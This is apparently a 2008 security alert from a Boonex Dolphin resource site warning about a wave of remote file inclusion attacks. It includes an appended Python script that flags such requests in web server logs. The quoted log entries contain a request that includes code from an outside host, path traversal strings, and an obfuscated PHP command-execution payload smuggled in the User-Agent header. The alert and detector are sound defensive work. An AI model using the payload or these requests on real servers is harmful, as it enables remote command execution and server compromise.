New RFI Dolphin Security Alerts

It seems there is a new wave of RFI attacks circulating. Be sure to check your logs and keep an eye out for something similar to the following. This is just a sample and I am doing some research and .htaccess modification testing...but just a little heads up for anyone interested.

The host, domains, and IPs will most likely vary. Notice the agent: http://cr4nk.ws/ [de] (Windows 3.1; I) [crank] which is not something we see very often.

Host: firestarter.dermichi.com





/errors.php?error=http://www.vogelgesang-av.de/cache/DONTDELETEFAGOT/i???
Http Code: 404     Date: Sep 19 19:19:16     Http Version: HTTP/1.1     Size in Bytes: -
Referer: -
Agent: http://cr4nk.ws/ [de] (Windows 3.1; I) [crank]





//plugins/safehtml/HTMLSax3.php?dir[plugins]=/../../../../../../../../../../../../../../../../../../../../../.
Http Code: 200     Date: Sep 19 19:19:17     Http Version: HTTP/1.1     Size in Bytes: 631
Referer: -
Agent: <? $x0e=\\\145x\\x65\\x63\; $x0f=\\\x66eo\\146\; $x10=\\\x66\\x72ea\\x64\; $x11=\\\146un\\x63\\164io\\x6e\\x5f\\x65x\\151s\\x74\\x73\; $x12=\i\\163\\x5f\\162\\x65s\\157ur\\x63\\x65\; $x13=\\\152\\157\\x69\\156\; $x14=\o\\142_g\\145t\\x5f\\x63o\\156\\164en\\x74\\x73\; $x15=\ob\\137\\x65\\156d\\137\\x63lea\\156\; $x16=\\\x6fb_st\\x61\\x72\\164\; $x17=\\\x70\\141\\163s\\164\\x68\\162\\165\; $x18=\\\x70\\143\\154ose\; $x19=\p\\157\\160e\\x6e\; $x1a=\\\163h\\145\\154l\\137\\x65\\170e\\143\; $x1b=\\\x73\\x79s\\x74e\\x6d\; function x0b($x0b){ global $x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b; $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b,$x0c);$x0c = $x13(\\\n\,$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b,\\\x72\))){ $x0c = \\; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d,1024); } @$x18($x0d);} } return $x0c;}echo x0b(\ec\\150\\157\\x20c\\1624n\\153\\137\\x72oc\\153s\);?>





//plugins/safehtml/HTMLSax3.php?dir[plugins]=../../../../../../../../../../../../../../../../../../../../../..
Http Code: 200     Date: Sep 19 19:19:18     Http Version: HTTP/1.1     Size in Bytes: 631
Referer: -
Agent: <? $x0e=\\\145x\\x65\\x63\; $x0f=\\\x66eo\\146\; $x10=\\\x66\\x72ea\\x64\; $x11=\\\146un\\x63\\164io\\x6e\\x5f\\x65x\\151s\\x74\\x73\; $x12=\i\\163\\x5f\\162\\x65s\\157ur\\x63\\x65\; $x13=\\\152\\157\\x69\\156\; $x14=\o\\142_g\\145t\\x5f\\x63o\\156\\164en\\x74\\x73\; $x15=\ob\\137\\x65\\156d\\137\\x63lea\\156\; $x16=\\\x6fb_st\\x61\\x72\\164\; $x17=\\\x70\\141\\163s\\164\\x68\\162\\165\; $x18=\\\x70\\143\\154ose\; $x19=\p\\157\\160e\\x6e\; $x1a=\\\163h\\145\\154l\\137\\x65\\170e\\143\; $x1b=\\\x73\\x79s\\x74e\\x6d\; function x0b($x0b){ global $x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b; $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b,$x0c);$x0c = $x13(\\\n\,$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b,\\\x72\))){ $x0c = \\; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d,1024); } @$x18($x0d);} } return $x0c;}echo x0b(\ec\\150\\157\\x20c\\1624n\\153\\137\\x72oc\\153s\);?>


gameutopia

http://www.dialme.com

DialMe.com - Your One and Only Source For Boonex Dolphin Tutorials and Resources
20 Sep 2008
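A log check for the three traits visible in the sample above (a URL passed as a parameter value, a long `../` chain, and PHP code or the `cr4nk` string in the agent field), as an added example that is not part of the original post. It assumes Apache combined-format access logs; the sample lines, addresses and rule names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Assumed input: Apache "combined" format,
#   ... "METHOD URI PROTO" status size "referer" "agent"
LINE_RE = re.compile(
    r'"[A-Z]+ (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>.*)"$')
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.I)  # parameter value is a URL
TRAVERSAL_RE = re.compile(r'(?:\.\.[/\\]){3,}')       # three or more ../ in a row
PHP_TAG_RE = re.compile(r'<\?')                       # PHP open tag inside a header

def classify(line):
    """Return (status, sorted reasons) for a suspicious line, else None."""
    m = LINE_RE.search(line)
    if not m:
        return None
    reasons = set()
    # Split on the first "?" by hand: the logged URIs start with "//",
    # which urlsplit() would misread as a network location.
    _, _, query = m["uri"].partition("?")
    # parse_qsl percent-decodes values once, so %2e%2e%2f is caught too.
    for _, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_RE.match(value):
            reasons.add("remote-url-parameter")
        if TRAVERSAL_RE.search(value):
            reasons.add("path-traversal")
    agent = m["agent"]
    if PHP_TAG_RE.search(agent):
        reasons.add("php-in-user-agent")
    if "cr4nk" in agent.lower():
        reasons.add("cr4nk-agent")
    return (int(m["status"]), sorted(reasons)) if reasons else None

def scan(lines):
    """Map 1-based line number -> (status, reasons) for every flagged line."""
    return {n: hit for n, line in enumerate(lines, 1) if (hit := classify(line))}

# Constructed sample lines (documentation addresses, harmless agent body).
SAMPLE = [
    '192.0.2.10 - - [19/Sep/2008:19:19:16 +0000] "GET /errors.php?error=http://files.example.invalid/i??? HTTP/1.1" 404 - "-" "http://cr4nk.ws/ [de] (Windows 3.1; I) [crank]"',
    '192.0.2.10 - - [19/Sep/2008:19:19:17 +0000] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=/../../../../../. HTTP/1.1" 200 631 "-" "<? echo 1; ?>"',
    '198.51.100.7 - - [19/Sep/2008:19:20:01 +0000] "GET /index.php?page=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, (status, reasons) in scan(SAMPLE).items():
        print(n, status, ", ".join(reasons))
```

Flagged lines that returned status 200, like the second and third requests in the post, are the ones to review first, since the server answered them rather than rejecting them.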
 
 